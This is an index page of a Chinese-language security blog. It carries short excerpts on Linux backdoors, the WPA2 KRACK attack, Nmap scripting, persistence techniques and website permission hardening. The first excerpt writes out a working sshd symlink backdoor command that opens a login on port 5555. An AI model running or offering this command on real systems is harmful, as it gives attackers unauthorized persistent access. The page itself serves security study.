终于明白' blog|关注信息安全-Try to make you laugh but lost the cry for you

终于明白' blog|关注信息安全

欢迎光临
一直在努力

【东京不太热】 Linux经典后门的探究

今天在搜索关于Linux下的后门姿势时,发现一条命令如下: 软链接后门: Default 1 ln –sf /usr/sbin/sshd /tmp/su; /tmp/su –oPort=5555; 经典后门。直接对s...

最新发布

部分文章收集整理,个人收集学习用,涉及版权利益请联系删除 ⊙﹏⊙‖
WPA2 密钥重装攻击 KRACK Attacks-终于明白' blog|关注信息安全
转载

WPA2 密钥重装攻击 KRACK Attacks

 本次的WPA2“密钥重装攻击”,基本原理为利用WPA协议层中的逻辑缺陷,多次重传握手过程中的消息3从而导致重放随机数和重播计数器,为攻击者提供了利用条件。 在协议中还存在一条危险的注释“一旦安装后,就可从内存中清除加密密钥”,若按此注释...

Nmap插件编写之MySQL写库-终于明白' blog|关注信息安全
转载

Nmap插件编写之MySQL写库

 *本文原创作者:010sec,属于FreeBuf原创建立计划,禁止转载 0×01 Nmap介绍 Nmap是一款针对大型网络的端口扫描工具,尽管它也适用于单机扫描。在不同情况下,你可能需要隐藏扫描、越过防火墙扫描或者使用不同的协议进行扫描...

来自后方世界的隐匿威胁:后门与持久代理(二)-终于明白' blog|关注信息安全
转载

来自后方世界的隐匿威胁:后门与持久代理(二)

 *本文原创作者:2cat,本文属FreeBuf原创奖励计划,未经许可禁止转载 继上篇后门与代理内容后,我觉得应该继续写下去。 考虑到第一篇内容发出后不少看官提出了质疑与不同看法,有人认为技术点过于老旧,甚至高级黑的后门手段都是购买而来。...

【技术分享】网站权限的安全配置-终于明白' blog|关注信息安全
转载

【技术分享】网站权限的安全配置

 【技术分享】网站权限的安全配置 2017-10-14 13:30:48 阅读:6567次 点赞(0) 收藏(38) 来源: 神月资讯 作者:神月资讯 0x01   前言 日防夜防,但指不定哪天又有0day出...